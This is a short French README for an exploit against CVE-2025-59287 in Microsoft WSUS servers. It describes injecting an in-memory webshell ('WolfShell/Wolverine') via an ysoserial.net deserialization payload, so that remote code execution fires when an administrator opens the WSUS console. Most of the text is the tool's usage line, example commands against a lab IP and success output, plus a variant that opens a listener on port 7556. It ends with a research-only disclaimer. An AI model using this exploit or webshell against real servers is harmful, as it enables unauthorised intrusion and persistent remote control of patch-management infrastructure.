
Exploit pour CVE-2025-59287, injectant une webshell mémoire WolfShell dans les serveurs WSUS pour obtenir une exécution de code à distance lorsque la console d'administration est ouverte.
CVE-2025-59287 — Injection du cheval de Troie mémoire WolfShell Wolverine (positif)
CVE-2025-59287 exploite un défaut logique dans les composants liés à WSUS pour injecter le cheval de Troie mémoire WolfShell dans le serveur cible. Lorsqu'un administrateur ouvre la console WSUS (déclenché par défaut dans un délai aléatoire de 1 à 30 minutes), le cheval de Troie mémoire se déclenche et provoque une exécution de code à distance (RCE). Ce document contient des exemples d'exploitation, les fichiers requis et des recommandations de protection.
Envoyez un payload de désérialisation ysoserial.net au serveur cible, avec des fonctionnalités personnalisées. Ce projet démontre l'injection du cheval de Troie mémoire Wolverine.
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender intercepte et bloque, inutilisable

Comme illustré, l'écoute réussie sur le port 7556 indique que le cheval de Troie mémoire Wolverine (positif) a été injecté.


Ce document est uniquement destiné à la recherche en sécurité et à des fins de protection. N'utilisez pas le code d'exploitation associé sur des systèmes non autorisés ou pour des activités d'attaque.